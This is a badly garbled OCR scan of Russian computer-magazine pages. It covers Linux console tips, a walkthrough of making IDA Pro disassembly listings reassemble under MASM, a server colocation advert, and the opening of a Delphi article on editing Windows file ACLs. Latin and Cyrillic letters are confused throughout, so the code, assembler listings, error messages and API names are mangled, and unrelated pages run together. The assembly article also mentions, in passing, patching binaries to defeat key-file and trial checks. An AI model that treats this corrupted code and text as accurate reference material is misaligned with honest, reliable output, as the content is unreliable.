$ іог ѵѵаѵ іп ігаск*.ѵѵаѵ; сіо 
оддепс $ѵѵаѵ && гт 4 $ѵѵаѵ 
В5опе| И 

Решение проблем 

■ «Слетела» консоль: 

рТезеіН 

■ Сбилось разрешение (этим грешитѵѵіпе): 

|$ хгапсіг -з о' 

■ Вывод І_іпих из глубокого ступо- 
ра (ЗузВц = Ргіпі Зсгееп): АІі+ЗузВд + К 

— уничтожить все программы в теку- 
щей виртуальной консоли; А4+ЗузНд+1| 

— послать всем процессам сигнал КІІ_І_; 
А4+5узВд+Е — послать всем процессам 
сигнал ТЕРМ; Аіі+Зуз Вд + В — экстренная 
перезагрузка без демонтирования фай- 
ловых систем. И-И 
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СЕКРЕТЫ АССЕМБЛИРОВАНИЯ ДИЗАССЕМБЛЕРНЫХ ЛИСТИНГОВ 

ДИЗАССЕМБЛЕР ЮА РРО (КАК И ЛЮБОЙ ДРУГОЙ) УМЕЕТ ГЕНЕРИРОВАТЬ АССЕМБЛЕРНЫЕ ЛИСТИНГИ, ОДНАКО ИХ 
НЕПОСРЕДСТВЕННАЯ ТРАНСЛЯЦИЯ НЕВОЗМОЖНА, И ПРЕЖДЕ ЧЕМ АССЕМБЛЕР ПРОГЛОТИТ НАЖИВКУ, ПРИХОДИТСЯ 
СОВЕРШИТЬ НЕМАЛО ТЕЛОДВИЖЕНИЙ, О САМЫХ ЗНАЧИМЫХ ИЗ КОТОРЫХ Я И РАССКАЖУ В ЭТОЙ СТАТЬЕ. 



О бычно дизассемблер исполь- 
зуется для реконструкции алго- 
ритма подопытной программы, 
послеэтогоон переписывается наСи/Си++, 
или же в двоичном файле правится тотнехо- 
роший ]х, который не дает приложению ра- 
ботать, если не найден ключевой файл или 
демонстрационный период давно истек. 
Значительно реже дизассемблированную 
программу требуется оттранслировать 
заново. Например, хочется исправить мно- 
жественные ошибки разработчиков, на- 
растить функционал или внести другие из- 
менения... Конечно, все это можно сделать 
непосредственно в двоичном коде, наложив 
на программу «заплатку», присобаченную 
с помощью іитр'ов. В большинстве случа- 
ев это самый короткий и самый надежный 
пусть. Нет никаких гарантий, что программа 
дизассемблирована правильно. Существу- 
ет, по меньшей мере, три фундаментальные 
проблемы дизассемблирования: 

А. синтаксическая неразличимость смеще- 
ний от констант; 

Б. неоднозначность соответствия ассем- 



блерных мнемоник машинным командам; 

В. Код, ошибочно принятый за данные, и дан- 
ные, ошибочно принятыезакод. 

Как следствие, откомпилированный ди- 
зассемблерный листинг, в лучшем случае, 
вообще не работает, зависая при запуске, 
в худшем же — периодически падает в раз- 
ных местах. Но до этих проблем нам — как 
до Луны, а может, еще и дальше. Для начала 
необходимо протащить дизассемблерный 
листинг сквозь ассемблер, устранив явные 
ошибки трансляции, а со всем остальным 
мы разберемся как-нибудь потом (быть мо- 
жет, даже в следующей статье). 

□ Первое боевое крещение 

Давай создадим простейшую консольную 
программку типа « Гі е 1 1 о , ѵѵогісі!», откомпили- 
руем ее, а затем дизассемблируем с помо- 
щью ЮА Рго и попытаемся ассемблировать 
полученный листинг. 

Исходный текст в нашем случае выглядит 
так: 

#іпсІисІе <зісііо. Іп> 



таіп () 

I 

ргіпіЩ«ГіеІІо, ѵѵогісі !\п»); 



Компилируем его компилятором МісгозоЙ 
ѴізиаІ С++ 6.0 с настойками по умолчанию 
(«сі. ехе бето_сопзоІе. с») и загружаем полу- 
ченный ехе-файл в ЮА Рго 4.7. Естественно, 
можно использовать и другие версии про- 
дуктов, но тогда результат будет несколько 
отличаться, что, впрочем, на ход повество- 
вания практически никак не повлияет. 
Дождавшись завершения дизассемблиро- 
вания файла, попросим ее сгенерировать 
ассемблированный листинг. Порядочные 
дизассемблеры поддерживают несколь- 
ко популярных синтаксисов: ТАЗМ, МАЗМ 
и, учитывая, что ЮА Рго недавно была пе- 
ренесена на Ыпих, неплохо бы добавить к 
этому списку еще и АТ&Т, но... увы! В меню 
«Орііопз» — > «Тагдеі аззетЫег» значится 
только какой-то загадочный «Оепегісіог ІпіеІ 
80x86», не совместимый ни с МАЗМ 'ом, ни с 
ТАЗМ'ом (во всяком случае, с их последними 
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> Критическая ошибка при попытке ассемблирования 
листинга, сгенерированного ЮА Рго 




> Успешно дизассемблированный файл 



версиями). В ЮА Рго 5.0 в этом отношении 
сделан огромный шаг вперед, и теперь нам 
предлагают выбор между «Оепегіс !ог Іп!еІ 
80x86» и «ВогІапсІ ТА8М іп ІсІеаІ тосІе7». 
Очень своевременное решение, особенно 
в свете того, что ТА8М давно мертв: не «пе- 
реваривает» новыхинструкций, необновля- 
ется, не поддерживается и официально не 
распространяется. ВогІапсІ уже давно заби- 
ла на этот проект. И хотя есть несколько не- 
коммерческих ТА8М-совместимых ассем- 
блеров (см. статью «Битва трансляторов»), 
всех проблем они не решают, и дизассем- 
блерные листинги транслируются только 
после существенной переделки, а раз так, 
то лучше остановить свой выбор на пакете 
МА8М, входящим в состав ІЧТЭЭК. 

Решено! Выбираем «Оепегіс !ог Іп!еІ 80x86» 
и говорим Рііе — > Ргосіисе ои!ри! !іІе — > 
Ргосіисе А8М !іІе или просто нажимаем горя- 
чую клавишу <АІ!-Р10>. Даем файлу имя (на- 
пример, «сІето_1 . азт») — и через несколь- 
ко минут шуршания диском у нас образуется 
нечто по имени «ничто». 

Скармливаем эту штуку ассемблеру «ті. 
ехе/с сІето_1- азт» (версия 6.13.8204) для 
справки. Транслятор выдает свыше сотни 
ошибок, после чего прекращаетсвою рабо- 
ту, не видя никакого смысла ее продолжать. 
Анализ показывает, что 90% ошибок свя- 
заны с неверным определением типа про- 
цессора «іпз!гис!іоп ог гедізіег по! ассеріесі 
іп сиггеп! СРІІ тосіе». Ах, да! По умолчанию 
ЮА Рго выбирает «МеіаРС (бізаззетЫе аІІ 
32-Ы! орсосіез)», но забывает поместить 
соответствующую директиву в дизассемб- 
лерный листинг, атранслятор поумолчанию 
устанавливает 8086 ЦП, совершенно не сов- 
местимый с 32-разрядным режимом. 

Лезем в начало листинга, вставляем дирек- 
тиву «.386», после чего повторяем сеанс 
трансляции заново. И опять куча ошибок 
(правда, на этот раз чуть меньше ста, что не 
может не радовать). Смотрим, что не понра- 
вилосьтранслятору: «бето_1. азт (34): еггог 
А2008: зупіах еггог: На!». Хм?! Открываем 
бето_1. азт, переходим кстроке34и видим: 



«тосіеі На!». А точка где?! Кто ее будет ста- 
вить? Абель, что ли? Возвращаем точку на 
место, заодно добавляя квалификатор язы- 
каСи: «. тобеІІІа!, С» и вновь прогоняем про- 
грамму черезтранслятор. НаэтотразМАЗМ 
едет крышей настолько, что выпадает в зо!!- 
ісе (если тот был предварительно запущен) 
или выбрасывает знаменитое сообщение о 
критической ошибке. 

Ладно, предположим, что это ошибка самого 
транслятора, легко обходимая добавлени- 
ем волшебного ключика «/со!!» к командной 
строке, и следующая попытка трансляции 
проходит уже без ошибок: «ті. ехе/с/со!! 
бето_1. азт». В смысле, без критических 
ошибок самого транслятора, а ошибок в лис- 
тинге по-прежнему предостаточно. 
Большинство из них относится к невозмож- 
ности определения имен библиотечных 
функций, имен и меток: 

сІето_1 . азт (53): еггог А2006: ипсІе!іпесІ зутЬоІ: _ргіпі! 

сІето_1 . азт (64): еггог А2006: ипсІе!іпесІ зутЬоІ: ехі! 

сІето_1 . азт (285): еггог А2006: ипсІе!іпесІ зутЬоІ: _!сІозе 
сІето_1 . азт (297): еггог А2006: ипсІеТіпесІ зутЬоІ: _!гее 
сІето_1. азт (453): еггог А2006: ипсІе!іпесІ зутЬоІ: о!!_ 
403450 

сІето_1. азт (490): еггог А2006: ипсІе!іпесІ зутЬоІ: о!!_ 
403450 

Черт! Как жемымоглизабыть,чтохитраяЮА 
Рго коллапсирует библиотечные функции, 
стремясь расчистить листинг от бесполез- 
ного мусора, не несущего никакой полезной 
нагрузки. Вернемся к рисунку 1 и сравним 
его со следующим фрагментом сгенериро- 
ван ногоассемблерного листинга: 

; [00000031 ВУТЕЗ: СОЦ-АРЗЕОРШСТЮМ-рпШ!. РВЕЗЗ 
КЕУРАй «+» ТО ЕХРАШ] 

; [000000Р4 ВУТЕЗ: СОІ_І_АРЗЕО ЕІІІ\ІСТІОІ\І зіагі. РВЕЗЗ 

Это же какую ума палату нужно иметь, что- 
бы допустить такое?! Интересно, тестиро- 
вался ли ассемблерный генератор вообще 
или был написан в расчете на авось?! Ма- 



терясь, возвращаемся в ЮА Рго, в меню 
«Ѵіеѵѵ» выбираем пункт «Цпітісіе а 1 1 » , на- 
блюдая за тем, как «раскрываются» биб- 
лиотечные функции. 

Генерируем новый ассемблерный файл 

— на этот раз «бето_2. азт», — не забыв 
вставить в его начало директивы «.386» и «. 
тосіеі !1а!, С». Повторяем трансляцию. Про- 
сматривая протокол ошибок (ну куда же ЮА 
Рго без ошибок), судивлением обнаружива- 
ем множественные ругательства на неоп- 
ределенные символы 8!аг!ирІп!о и СР1п!о, 
представляющие собой легко узнаваемые 
структуры: 

сІето_2. азт (2533): еггог А2006: ипсіеііпесі зутЬоІ: 
_5ТАВТІІРІІ\ІЕОА 

сІето_2. азт (4276): еггог А2006: ипсІе!іпесІ зутЬоІ: 
_сріп!о 

Куда же они могли подеваться?! Открываем 
ассемблерный листинг в текстовом ре- 
дакторе и... нет, в русском языке просто не 
существует подходящих слов, чтобы адек- 
ватно выразить наше состояние: 

Сколлапсированные структуры в ассемблер- 
ном файле 

; [00000012 ВУТЕЗ. СОІШАРЗЕБ ЗТВІІСТ_сріп!о. РВЕЗЗ 
КЕУРАБ «+» ТО ЕХРАШ] 

;[00000044ВУТЕЗ.СОи_АР8ЕОЗТВиСТ_5ТАВТІ)РІМЕОА. 
РВЕЗЗ КЕУРАБ «+» ТО ЕХРАШ] 

Ассемблерный генератор ЮА Рго поместил 
структуры в целевой файл, даже не удосу- 
жившись их автоматически развернуть! 
Что же, придется это сделать самостоя- 
тельно. Возвращаемся в ЮА Рго, в меню 
«Ѵіеѵѵ» находим пункт «Ореп ЗиЬѵіеѵѵ», а там 

— «8!гис!игез» или просто жмем горячую 
клавишу <8Гіі!!-Р9>. Перед нами появляется 
окно с перечнем всех структур, и для их раз- 
ворота достаточно дать команду «Ѵіеѵѵ» — > 
«ІІпІіісІе аІІ», после чего можно повторить ге- 
нерацию ассемблерного файла, назвав его 
«бето_3. азт» (про директивы. 386/. тосіеі 
!Іа! мы не забываем, да?). 
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> Т рансляция ассемблерного листинга в режиме совместимости с МАЗМ 5.1 



Поразительно, но количество ошибоктранс- 
ляции совсем не уменьшается, а даже воз- 
растает. И ассемблер по-прежнему не может 
найти «развернутые» структуры. Что же ему 
мешает? Присмотревшись к логу ошибок 
повнимательнее, мы видим, что ругательству 
на неопределенный символ предшеству- 
ет ошибка типа «орегапсі пгіизі Ье а тетогу 
ехргеззіоп» (операнд должен быть выраже- 
нием, адресующим память): 

сІето_3. азт (2561): еггог А2027: орегапсі тизі Ье а 
тетогу ехргеззіоп 

сІето_3. азт (2596): еггог А2006: ипсіеііпесі зутЬоІ: 
Зіагіиріпіо 

сІето_3. азт (2599): еггог А2006: ипсІеТіпесІ зутЬоІ: 
Зіагіиріпіо 

сІето_3. азт (2601): еггог А2006: ипсіеііпесі зутЬоІ: 
Зіагіиріпіо 

Открываем ассемблерный файл в редакто- 
ре, переходим к строке 2561 и видим следу- 
ющую картину: 

іоіпіі ргос пеаг; ССЮЕ ХНЕЕ: зіагі+6Е001 22р 

Зіагіиріпіо = _ЗТАРТІІРІІ\ІЕОА ріг-44Ь 

стр [езр+54Ь+5іагіирІпіо. сЬРезегѵесІ2], 0 

\2. Іос_4022Еб| 

игру _ еах, [е$р+54Ь*ЗіагіирІпіо. ІрЯезегѵесІ2] 

Я не уверен на счет «Оепегіс Тог ІпіеІ 80x86», 
но транслятор МА5М, начиная с версии >5.1, 
такого способа объявлений структур уже не 
поддерживает, и, чтобы откомпилировать 
программу, у нас есть, по меньшей мере, два 
пути: разрушить все структуры (все равно в 
ассемблерном листинге они нам несильно 
понадобятся) или же использовать ключ ко- 



мандной строки/2т, обеспечивающий об- 
ратную совместимость с МАЗМ 5.1 . Вот так, 
наверное, мы и поступим: «ті. ехе/с/соіі/2т 
бето_3. азт». 

Количество ошибок сразу же уменьшается 
чуть ли не в три раза, и они свободно поме- 
щаются на экран, что не может не радовать! 
Подавляющее большинство ошибок имеют 
тип «тіззіпд орегаіог іп ехргеззіоп» (в выра- 
жении отсутствует оператор), и чем скорее 
мы с ними разберемся, тем будет лучше как 
для нассамих, таки для транслируемой про- 
граммы. 

Переходим к строке 141 и видим: 

тоѵ еах, Іагде із:0 
ризЬ еах 

тоѵіагде Тз:0, езр 

Ну и зачем ассемблерному генератору было 
вставлять «Іагде»? Все равно МАЗМ его не 
понимает. Находясь в интегрированном ре- 
дакторе РАЯ'а, нажимаем <СігІ-Р7> (геріасе) 
и заменяем все «Іагде із» на просто «Тз». 
Теперь после трансляции остается совсем 
немного ошибок, на которые мы продолжим 
планомерно наступать: 

сІето_3. азт (70): еггог А2015: зедтепі аіігіЬиіез саппоі 
сЬапде: АІІдптепі 

сІето_3. азт (8063): еггог А21 89: іпѵаіісі сотЬіпаііоп ѵѵіііі 
зедтепі аіідптепі: 2048 

сІето_3. азт (12004): еггог А2015: зедтепі аіігіЬиіез 
саппоі сЬапде: Аіідптепі 

сІето_3. азт (13742): еггог А2005: зутЬоІ гесіеііпіііоп: 
ссЬМиіііВуіе 

сІето_3. азт (14176): еггог А2005: зутЬоІ гесіеііпіііоп: 
ЕІІепате 

сІето_3. азт (14200): еггог А2005: зутЬоІ гесіеііпіііоп: 
Ьосаіе 



сІето_3. азт (14215): еггог А2005: зутЬоІ гесіеііпіііоп: 
СосІеРаде 

сІето_3. азт (142): еггог А2206: тіззіпд орегаіог іп 
ехргеззіоп 

сІето_3. азт (2860): еггог А2206: тіззіпд орегаіог іп 
ехргеззіоп 

сІето_3. азт (2888): еггог А2206: тіззіпд орегаіог іп 
ехргеззіоп 

сІето_3. азт (2924): еггог А2006: ипсіеііпесі зутЬоІ: 
Іос.402480 

сІето_3. азт (3639): еггог А2001 : іттесііаіе орегапсі поі 
аііоѵѵесі 

сІето_3. азт (4158): еггог А2006: ипсіеііпесі зутЬоІ: 
Іос_40201 1 

сІето_3. азт (1257): еггог А2006: ипсіеііпесі зутЬоІ: 
$І\ЮРМАІ__ЗТАТЕ$1535 

сІето_3. азт (1258): еггог А2006: ипсіеііпесі зутЬоІ: 
іос_4012АА 

сІето_3. азт (1259): еггог А2006: ипсіеііпесі зутЬоІ: 

ттм 

сІето_3. азт (1260): еггог А2006: ипсіеііпесі зутЬоІ: 

ЩЩбіЩі 

сІето_3. азт (1261): еггог А2006: ипсіеііпесі зутЬоІ: 
1рс_40134$ 

сІето_3. азт (1262): еггог А2006: ипсіеііпесі зутЬоІ: 
ІрС_40і|і| 

сІето_3. азт (1263): еггог А2006: ипсіеііпесі зутЬоІ: 
16с,401385 

сІето_3. азт (1264): еггог А2006: ипсіеііпесі зутЬоІ: 
|Ёк4014і| 

Беглый взгляд на л истин г обнаруживает 
целый каскад ошибок типа «ипбеЛпесІ 
зутЬоІ» (неопределенный символ). 
Посмотрим, что же у нас не определено 
на этот раз. Переходим к строке 1257, 
за которой тянется целый хвост ошибок 
в строках 1258, 1259, 1260, 1261, 1262, 
1263 и 1264. Это настоящее осиное 
гнездо, обитель зла, которую я соби- 
раюсь разбить одним взмахом своего 
крыла: 

1 257: оіі_401 956 сісі оіізеі $І\ЮВМАІ__ЗТАТЕ$1 535 
1 258: сісі оіізеі Іос_401 2АА 

1259: сісі оіізеі Іос_401 2С5 

1260: сісі оіізеі Іос_401 311 

Хм, выглядитвполнеобычно, ивсеметкибез 
исключения обнаруживаются простым кон- 
текстным поиском: 

$І\ЮНМАІ__ЗТАТЕ$1 535: тоѵ есх, сіѵѵогсі_406428 
Іос_4012АА: ог [еЬр+ѵаМО], ОЕЕЕЕЕЕЕЕЬ 

Іос_4012С5: тоѵзхеах, Ы 



> Ассемблеры, поддерживаемые ЮА Рго 4.7 (слева) и ЮА Рго 5.0 (справа) 
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Почему же тогда ассемблерный транслятор их не видит?! Все 
дело в том, что ЮА Рго неверно определила границы функции, 
поместив обращения к меткам за границы функции, в которой 
они упоминаются!!! А метки вообще-то локальны. Вот потому-то 
транслятор их и не находит! 

$І\ІОРіМАІ__5ТАТЕ$1 535: 

Іос_4012АА: 

Іос_4012С5: 

Іос_401 31 1 : 

оиіриі епсір; <~ конец функции 

оТТ_401 956 сісі оіізеі $І\ЮНМАІ__ЗТАТЕ$1 535 
сісі о11зеЦос_4012АА 
сісі оЯзеІІос_4012С5 
ЦЦо11зеПос_40131 1 

Чтобы исправить ситуацию, необходимо переместить директи- 
ву « оиіриі: епсір» за конец обращений к меткам. Так, чтобы они 

стали частью функции оиіриі. После чего ассемблерный код 

будет выглядеть так: 

ОІЩ401956 сісі оіізеі $1\ЮНМА1__5ТАТЕ$1 535 
сісі о11зеіІос_4012АА 
сісі оіізеі Іос_4012С5 
щоиіриі епф 

После ассемблирования количество ошибок тает буквально на 
глазах, и мы даже в порыве вдохновения едва удерживаемся от 
того, чтобы не закурить новый косяк: 

сІето_3. азт (70): еггог А201 5: зедтепі аіігіЬиіез саппоі сііапде: АІІдптепі 
сІето_3. азт ( 8064 ): еггог А21 89: іпѵаіісі сотЬіпаІіоп ѵѵіЛп зедтепі аіідптепі: 2048 
сІето_3. азт (12005): еггог А2015: зедтепі аіігіЬиіез саппоі сЬапде: Аіідптепі 

сІето_3. азт ( 2925 ): еггог А2006: ипсІеТіпесІ зутЬоІ: Іос_402480 
сІето_3. азт ( 3640 ): еггог А2001 : іттесііаіе орегапсі поі аііоѵѵесі 
сІето_3. азт ( 41 59 ): еггог А2006: ипсІеТіпесІ зутЬоІ: Іос_402й1 1 

В глаза бросается пара уже известных нам ошибок типа «ипсіеііпесі 
зутЬоІ » , первую из которых исправить достаточно легко: 

Оригинальный код, сгенерированный ЮА Рго, который не хочет 
транслироваться 

_І\ІІ_(3_І\Іоіі1у1: 
ризЬ еЬх 

ризЬ есх 

■ ёЬх, оіізеі: 

Ітр зЬогі Іос_402480 

І\ІІ_0_І\Іоіі1у ргос пеаг 

ризЬ 

ризЬ есх 



Соіосаііоп 

Размещение оборудования в Москве 




Что такое размещение сервера (со-Іосаііоп) ? 
Со-Іосаііоп — это размещение Вашего сервера на 
площадке (в дата-центре) провайдера, в 19" стойке 
(гаек). Услуги по размещению сервера (соііосаііоп), 
включают наличие основного и резервного электро- 
питания, контроля температурно-влажностного 
режима, системы автоматического газового пожаро- 
тушения, ограничение доступа к Вашему оборудова- 
нию, наличие быстрых основного и резервного 
интренет-каналов, сохранность Ваших серверов, 
и опционально — услуги по администрированию 
серверов. 

Вам либо будет предоставлен в аренду Интернет- 
канал гарантированной пропускной способности, 
либо будет предложено оплачивать трафик, при 
некоторых условиях трафик может быть бесплатный. 

Почему размещать оборудование у нас? 

— Мы размещаем оборудования в двух дата-центрах 
в Москве: дата-центре М9 и дата-центре СТЕК; 

— Мы обеспечиваем круглосуточный мониторинг 
работоспособности Ваших серверов; 

— Мы обеспечиваем Вам доступ к оборудованию по 
предварительной заявке; 

— Мы предоставляем подключение на скорости от 
ІООтЬрз до ІСЬрз; 

— Мы окажем Вам помощь в решении проблем. 

Какие преимущества услуги размещения сервера? 

Услуги по размещению серверов в дата-центрах 
включают множество преимуществ для владельцев 
сайтов, таких, как: 

— Полный контроль над серверами; 

— Для серверов специальные условия хранения 
и функционирования; 

— Серверы настолько быстры и производительны, 
как вы захотите, вы можете обновлять серверы; 

— Уменьшенная зависимость от услуг провайдеров, 
большинство задач администрирования и настроек 
можно проводить удаленно, значительная гибкость; 

— Возможность использовать имеющиеся серверы; 

— Построение собственных отказоустойчивых 
решений. 
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> Результат непосредственной трансля- > Автоматическая замена всех «Іагде Тз» 
ции дизассемблерного листинга на «Тз» в РАВ'е 



тоѵ еЬх, оГзеі ипк_406364 

тоѵ есх, [еЬр+8] 

)1Ь_402480: 

тоѵ ЙДх+41. еах 

тоѵ [еЬх+ОСІп], еЬр 

_І\ІІ_0_0ізраІсГі: 

-еЬХ 

ІМЙЙІ;'. • '4 

МЬ(3_Мо%епсІр 

Достаточно «завести» подпрограмму КІІ_0_ 

ЫоІіТуІ под «геіп 4» процедуры 1\11_0_1\1о1у{у, 

но перед директивой І\ІІ_Ѳ_І\ІоШу епсір. Тог- 

да метка будет распознаваться как надо! 

М1_(3_Г\1ой{у ргос пеаг 

ризИ еЬх 

ІзщІт ёсх 

тоѵ - еЬх, ойзеі ипк_406364 
тоѵ есх, [еЬр+8] 

Іос_402480: 

тоѵ [еЬх+8],есх 

тоѵ | [еЬх+43, ѳаХ 

тоѵ [еЬх+ОСН], еЬр 

ЫІ_0_0ізраІсГі: 

рор есх 

рор еЬх 

ДИЮ;! 

ризИ еЬх 

ризГі есх 

тру | еЬх, оЯзеІ: ипк_406384| 

Ітр зГюгІ Іос_402480 

МКЗ.ЫоШу епсір 

А вот со следующей ошибкой справиться 
уже сложнее, поскольку функция зігсру со- 
вершает прыжок в середину функции зігсаі: 

ЮА Рго сгенерировала неработоспособный 
листинг для парной функции зігсру/зігсаі 

_з!гсрургос пеаг 
агд_0 = сіѵѵогсі ріг 8 



ризГі есіі 

тоѵ есіі, [езр+агд_0] 

ітр Іос_40201 1 

_зІгсру епсір 

_зІгсаІ ргос пеаг 

агд_0 = сіѵѵогсі ріг4 
агд_4 = сіѵѵогсі ріг8 

тоѵ еех, [езр+агдфЗ 

1ос_40201 1 : 

тоѵ есх, [е$р+4+агд_4] 

іезі есх, 3 

\ 7 - Іос_402036 

геіп 

_з1гсаІ епсір 

Никакими ухищрениями у нас не получит- 
ся перетасовать код так, чтобы метка Іос_ 
402011 оказалась в границах видимости, но 
ведь как-то же это было запрограммирова- 
но?! Обратившись к исходным текстам биб- 
лиотеки ЫВС. ИВ (они поставляются вместе 
с компилятором), мыобнаружим волшебный 
ключик. Чтобы метка была видна отовсюду, 
после нее должен стоят не один знак »:», а 
целых два — »::». 

Самая трудная задача осталась позади, и 
теперь нам предстоит разобраться с уже 
встречавшимися ошибками типа «тіззіпд 
орегаіог іп ехргеззіоп». На этот раз транс- 
лятору не понравились конструкции «ризН 
Іагде сіѵѵогсі ріг 1з:0» и «рор Іагде сіѵѵогсі ріг 
із:0». Убираем все лишнее, превращая их в 
«ризМз:0» и «рор!з:0» и движемся дальше, 
где нас ждет ошибка «іттесііаіе орегапсі 
по! аііоѵѵесі» (непосредственный операнд 
недозволен), затаившаяся в 3640 строке: 
«"стр 1_оса1е,0». Естественно, транслятор 
решил трактовать І_осаІе как смещение, а 
не как содержимое ячейки, поэтому без яв- 
ной расстановки квадратных скобок здесь 
не обойтись: «стр сіѵѵогсі ріг бз: [І_оса1е],0». 
Теперь на линии фронта остается лишь 
большой конгломерат ошибок типа «зутЬоІ 
гесІеТіпіІііоп » (символ переопределен), про- 
тив которых не пропрешь, ведь он дейс- 
твительно переопределен, вот, например, 
взять тот же ссНМиШВуіе: 



сгіЬСМарЗігіпдАргос пеаг 

; ССЮЕ ХНЕР: _зеіЗВІІрІ_оѵѵ+ВЕр 
; _зеі:3 ВирЕоѵѵ+ Ебр 

І_осаІе = сіѵѵогсі ріг 8 
ІрМиШВуіеЗіг = сіѵѵогсі ріг 1 0Гі 
ссЫѴІиШВуіе = сіѵѵогсі ріг 1 4Гі 

сгіЬСМарЗігіпдА епсір 

ссГіМиШВуІесІс1 1; йАТАХВЕР: _ѵѵс1отЬ+31г 

Ничего не остается, как «расщеплять» пе- 
ременные вручную, давая им различные 
имена. Главное — не перепутать перемен- 
ные местами. Впрочем, перепутать будет 
довольно трудно, поскольку однакопия пе- 
ременной — локальная и адресуется через 
стек, а другая — глобальная, и обращение 
с ней происходит через непосредственную 
адресацию. 

Разобравшись с астральными перемен- 
ными, нам остается только побороть три 
ошибки, связанные с выравниванием. Ну, 
ошибку в строке 8064 мы ликвидируем пу- 
тем удаления директивы «аіідп 800Н» (800Н 
в десятичном представлении как раз и бу- 
дет 2048). Две остальные ошибки требуют 
переименования сегментов _іехі и _ба1а 
во что-нибудь другое, например, в _іех!1 и 
_баіа1 , только это переименование должно 
идти по всему тексту. 

О Победа за нами? 

Все! Теперь ассемблерный листинг, сгене- 
рированный дизассемблером и «слегка» 
исправленный напильником, транслирует- 
ся без ошибок! Добавим к командной стро- 
ке МА8М'а ключ »/Ср», чтобы он соблюдал 
регистр публичных имен, и вот тут-то выяс- 
няется, чтополученныйоЬ] наотрезотказы- 
вается линковаться, потому что линкер не 
может найти АРІ-функции! 

Это не покажется удивительным, если 
вспомнить, что ЮА Рго объявила их в «удо- 
бочитаемом» виде, который совсем не сов- 
падет с тем, как они объявлены в библиоте- 
ках. Но линковка (и последующая доводка 
программы до ума) — это уже тема совсем 
другой статьи. НЕ 
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ПРАВА ДОСТУПА ПРОГРАММНО — 0Т0ПР0СТДО 










огда я впервые разбирался с де- 
скрипторами, то большинство 
приходилось определять ме- 
тодом научного тыка. Всезнающий МЗЭІЧ 
помогает, но очень слабо, а в интернете эта 
тема очень плохо освещена — только об- 
рывки информации, да и кода нормального 
нет. В МЗЭІЧ описаны только функции и их 
параметры, акакпользоваться ими, сказано 
только поверхностно. Как говорил великий и 
могучий Винни-Пух: «Мед вроде есть, но его 
сразу нет». Здесь — та же песня: вроде бы 
функции описаны, но чего-то не хватает. 
Давай для начала на пальцах разберемся, 
как нужно устанавливать права на объект 
ОС, а потом познакомимся с функциями 
и практическим примером. Под объектом 
в данном случае понимаются процессы и 
файлы, находящиеся на ІЧТРЗ. Для тех, кто 
подключился к нам только сегодня, напоми- 
наю, что в РАТ32 слишком скудные возмож- 
ности по защите файлов, и здесь списки 
АСЬ не работают. Хотя нет, списки работают 
везде, но в РАТ32 на определенный файл 
нельзя настраивать права доступа. Если ты 
все еще используешь РАТ, то рекомендую 
сегодня же конвертнуть его в ІМТРЗ. Главное 
— ничего не бойся. 

У каждого объекта есть свой дескриптор. В 
нем содержится указатель на список АСІ_, а 
уже в этом списке можно найти записи, ко- 
торые определяют права доступа. Самый 
простой способ удалить определенную 
запись из списка — скопировать все необ- 
ходимые записи в новый список и устано- 
вить их дескриптору, а затем дескриптор 
назначить файлу. Так как списки в основном 
небольшие и занимают мало места, такой 
финтушами пролетит мгновенно. 

Чтобы добавить разрешение или запрет, не- 
обходимо расширить память для АСІ_-спис- 
каи втиснутьтуда новую запись. Можно пос- 
тупить проще: выделить память для нового 
списка, достаточную для хранения всех ста- 
рых записей. Теперь копируем в новый АСІ_ 
все старые записи и добавляем новую. Ос- 
тается только назначить созданный список 
дескриптору, а затем и файлу. 

О Поехали 

Для написания примера нам понадобятся 
все знания, которые мы получили из двух 
предыдущих статьей этого небольшого 
посвящения в безопасность ѴѴіпбоѵѵз, плюс 
маленькая корзина новых функций. Давай 
напишем пример, который будет добав- 
лять в АСІ_ новую разрешающую запись 
для всех пользователей на определен- 
ный файл. В ОС ѴѴіпбоѵѵз для этого нуж- 



> Подробная и свежая информация об 
АббАссеззАІІоѵѵебАсе есть в МЗЭІЧ 

но найти ЗІЭ учетной записи еѵегуопе и 
добавить ее с разрешением СЕІЧЕЯІС_АІ_І_ 
в список АСЬ. 

Начнем с поиска ЗЮ необходимой записи. 
Следующий код показывает, как можно най- 
ти идентификатор для еѵегуопе: 

ііяаімі 

І_оокирАссоип1:І\Іате(піІ, 'еѵегуопе 1 , піі, зісНепдіГі, піі, 

1 &г іі .І Шші 

//выделяем память 
зісІѴаІие := АІІосМет(зісИепдІІі); 
сіотаіпі := АІІосМет(зібІепдІЮотаіп); 



зісІІ_епдіГі, сіотаіпі , зісШепд 
іИеп 

ИМ 



тОотаіп, зісГГуі 



Все эти функции мы рассматривали в августе 
этого года. Сочувствую тем, кто в это время от- 
дыхал на море и пропустил выпуск номера. 

□ Назад в будущее 

Теперь определяем текущую информа- 
цию безопасности файла с помощью 
СеіІЧатебЗесипіуІпІо и дезинформацию с 
помощью ѲеІАсІІпІогтаІіоп. Эти функции мы 
использовали в прошлом номере. Можешь 
взять код оди н к одному и даже оставить ста- 
рую форму главного окна для выбора фай- 
ла. Получив информацию о текущем спис- 
ке, необходимо выделить память под новый 
список. Как рассчитать новый размер? Все 
достаточно просто. У нас есть размер теку- 
щего списка в поле АсІВуіезІпІІзе структуры 
АсІІпІо. Эту структуру мы получили после 
вызова функции ОеіАсІІпіогтаііоп. К этому 
размеру мы добавляем размер разрешаю- 
щей структуры АССЕ35_АСЕ и размер ЗЮ- 
идентификатора пользователя, которого 
мы хотим внести в список: 



>Для создания примера я использовал 
форму и код из предыдущего номера ][ 

ИШИ ѳ: ШііііШШШіі 

+ Ѳе!Цепд!ІпЗіЦ(зісІѴаІие)-зі 2 еоІ(ОѴѴОРО); 

Теперь выделяем память для нового АСІ_- 
списка и инициализируем его: 

ИЯМНкі- 

іі поі ІпіІіаІІ 2 еАсІ(рМе\лЮАСІ_ л , пеѵѵЗіге, — 



Для инициализации используется функция 
ІпШаІігеАсІ, которая выглядит следующим 
образом: 



ЯШМ 



пеѵѵЗі2е:=АсІІп^о.АсІВу1:езІпІ)зе + 

В файле справки из этого результата еще 
вычитается размер ЭѴѴОВЭ, но я этого не 
делаю, иу меня пример прекрасно работает. 
Если будут проблемы, то попробуй изменить 
строку так: 



Шпсііоп ІпіііаІІ 2 еАсІ( 
бѵѵАсІВеѵізіоп: ОѴѴОРЮ 

ІШНН 

Функция получает в качестве параметратри 
значения: 

• указатель на выделенную для списка па- 
мять; 

• размер списка; 

• ревизия, которая должна быть равна АСІ__ 
ЯЕѴІЗІОІЧ для данной версии ѴѴіпбоѵѵз. 

Мы будем использовать последнюю реви- 
